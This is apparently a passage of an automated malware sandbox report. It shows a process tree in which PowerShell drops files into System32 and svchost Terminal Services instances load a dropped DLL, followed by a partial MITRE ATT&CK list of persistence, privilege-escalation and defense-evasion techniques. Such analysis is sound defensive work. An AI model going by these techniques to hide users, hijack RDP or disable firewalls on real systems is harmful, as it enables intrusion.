  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:5116
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:5044

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s TermService
1⤵
PID:1044

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2012

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
PID:4552

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:4892

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
PID:980

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
PID:5060

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:3304

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
PID:1808

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry